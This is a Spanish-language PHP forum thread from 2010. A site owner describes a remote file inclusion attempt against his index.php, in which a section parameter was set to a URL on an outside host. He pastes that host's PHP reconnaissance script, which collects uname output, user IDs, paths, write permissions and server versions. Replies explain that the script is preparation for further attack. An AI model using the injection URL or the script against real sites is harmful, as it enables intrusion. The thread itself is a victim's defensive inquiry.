Foros del Web » Programando para Internet » PHP »

¿Intento de ataque?

Estas en el tema de ¿Intento de ataque? en el foro de PHP en Foros del Web. Hola a todos, hace tiempo que estoy registrado pero hace tiempo que no entraba y no me acuerdo de mis datos de login así que ...
  #1 (permalink)  
Antiguo 07/02/2010, 15:47
 
Fecha de Ingreso: febrero-2010
Mensajes: 4
Antigüedad: 14 años, 9 meses
Puntos: 0
¿Intento de ataque?

Hola a todos, hace tiempo que estoy registrado pero hace tiempo que no entraba y no me acuerdo de mis datos de login así que me he creado otra cuenta.

Mi consulta es la siguiente, han entrado en mi web intentando pasarle a mi index.php un valor a una variable (por URL) que uso para redireccionar a las distintas secciones, concretamente la dirección es http://exnetwork.100webspace.net/on.txt y el contenido de ese archivo es

Código PHP:
<?php
  closelog
( );
  
$user get_current_user( );
  
$login posix_getuid( );
  
$euid posix_geteuid( );
  
$ver phpversion( );
  
$gid posix_getgid( );
  if (
$chdir == ""$chdir getcwd( );
  if(!
$whoami)$whoami=exec("whoami");
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">

<?php
  $uname 
posix_uname( );
  while (list(
$info$value) = each ($uname)) {
?>
  <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><span style="font-size: 9pt"><b>
        <?= $info ?>
      :</b> <?= $value ?></DIV></TD>
  </TR>
<?php
  
}
?>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">

    <span style="font-size: 9pt"><b>
    User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></TD>
  </TR>
  <TR>

  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
    <span style="font-size: 9pt"><b>
    Current Path:</b> <?= $chdir ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
    <span style="font-size: 9pt"><b>
    Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>

    </span></DIV></TD>
  </TR>  
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
    <span style="font-size: 9pt"><b>
    Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"?>
    </span></DIV></TD>
  </TR>

  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
    <span style="font-size: 9pt"><b>
    Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"?>
    </span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">

    <span style="font-size: 9pt"><b>
    Script Current User:</b> <?= $user ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;">
    <span style="font-size: 9pt"><b>
    PHP Version:</b> <?= $ver ?></span></DIV></TD>

  </TR>
</TABLE>
¿Alguien me explica un poco en que consiste este tipo de ataque?

Gracias
  #2 (permalink)  
Antiguo 07/02/2010, 16:43
 
Fecha de Ingreso: febrero-2010
Mensajes: 4
Antigüedad: 14 años, 9 meses
Puntos: 0
Respuesta: ¿Intento de ataque?

Releyendo lo escrito me he dado cuenta de que no me he explicado bien. El valor que le han intentado pasar a mi variable es precisamente esta url http://exnetwork.100webspace.net/on.txt? y el contenido de ese txt es el que he puesto en el primer post.

¿Alguna idea?

Gracias
  #3 (permalink)  
Antiguo 07/02/2010, 17:06
 
Fecha de Ingreso: diciembre-2009
Mensajes: 612
Antigüedad: 14 años, 11 meses
Puntos: 16
Respuesta: ¿Intento de ataque?

No sé lo que hace, pero porque no le pones extensión .php por seguridad?
  #4 (permalink)  
Antiguo 07/02/2010, 17:12
 
Fecha de Ingreso: febrero-2010
Mensajes: 4
Antigüedad: 14 años, 9 meses
Puntos: 0
Respuesta: ¿Intento de ataque?

Esa URL no es mia, y por tanto tampoco el archivo txt. Esa URL es el parámetro que le han querido pasar a mi variable.
  #5 (permalink)  
Antiguo 07/02/2010, 23:37
Hecto_o_c
Invitado
 
Mensajes: n/a
Puntos:
Respuesta: ¿Intento de ataque?

intentan obtener algunos datos de tu servidor...
  #6 (permalink)  
Antiguo 08/02/2010, 00:41
Avatar de maturano  
Fecha de Ingreso: enero-2010
Ubicación: /home/
Mensajes: 537
Antigüedad: 14 años, 10 meses
Puntos: 36
Respuesta: ¿Intento de ataque?

Me sigue sin quedar claro.

¿El código que dejas es el del archivo on.txt?. ¿Cómo llegó ese archivo ahí?.

Lo que está haciendo el código, así viendo rápido, es presentar información de tu servidor. usuario y servicios está corriendo y viendo sobre los permisos de escritura de la raíz de tu sitio. Sí, es un intento de ataque.

Lo que no me queda claro es lo del el llamado desde la URL ¿¿??
__________________
I ♥ The Music!
  #7 (permalink)  
Antiguo 08/02/2010, 02:20
 
Fecha de Ingreso: febrero-2010
Mensajes: 4
Antigüedad: 14 años, 9 meses
Puntos: 0
Respuesta: ¿Intento de ataque?

El código que he copiado pertenece al archivo txt y no es mío. Lo que han hecho es lo siguiente:

Yo tengo una web donde para acceder a las distintas secciones se le pasa una parámetro a una variable por url, algo así,

http://www.xxxxxxx.com/index.php?sec="lo que sea"

pues en "lo que sea" han colado la url http://exnetwork.100webspace.net/on.txt? quedando así

http://www.xxxxxxx.com/index.php?sec=http://exnetwork.100webspace.net/on.txt?

Pero no les ha funcionado, lo que quiero saber es que hubiera pasado si le hubiese funcionado el intento.
  #8 (permalink)  
Antiguo 22/02/2010, 13:18
 
Fecha de Ingreso: abril-2007
Mensajes: 82
Antigüedad: 17 años, 7 meses
Puntos: 0
Respuesta: ¿Intento de ataque?

Si subes ese archivo a tu servidor con extensión php puedes ver los datos que hubieran obtenido en caso de funcionar el ataque.

Hubieran obtenido una serie de datos con los que, por ejemplo (ver si pueden escribir en la raíz) copiar algunos archivo a tu servidor o simplemente borrartelos todos.

Saludos!

Etiquetas: intento, ataques
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 16:45.